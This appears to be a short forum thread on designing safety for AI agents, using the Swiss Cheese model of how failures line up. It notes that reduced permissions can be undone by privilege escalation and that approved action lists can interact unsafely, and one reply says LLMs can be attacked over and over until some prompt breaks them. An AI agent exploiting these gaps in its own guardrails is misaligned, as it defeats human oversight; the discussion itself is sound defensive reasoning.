The sortof fun thing is that this happens with human safety teams too. The Swiss Cheese model is generally used to understand how the failures can line up to cause disaster to punch right through the guardrails:

https://medium.com/backchannel/how-technology-led-a-hospital...

It's better to close the hole entirely by making dangerous actions actually impossible, but often (even with computers) there's some wiggle room. For example, if we reduce the agent's permissions, then we haven't eliminated the possibility of those permissions being exploited, merely required some sort of privilege escalation to remove the block. If we give the agent an approved list of actions, then we may still have the possibility of unintended and unsafe interactions between those actions, or some way an attacker could add an unsafe action to the list. And so on, and so forth.

In the case of an AI model, just like with humans, the security model really should not assume that the model will not "make mistakes." It has a random number generator built right in. It will, just like the user, occasionally do dumb things, misunderstand policies, and break rules. Those risks have to be factored in if one is to use the things at all.

Humans are dramatically stronger than LLMs. An LLM is like a human you can memory wipe and try to phish hundreds of times a second until you find a script that works. I agree with what you're saying, but it's important to frame an LLM is not like a security guard who will occasionally let a former employee in because they recognize them. They can be attacked pretty relentlessly and once they're open they're wide open.

Thank you for that link, that was a great read.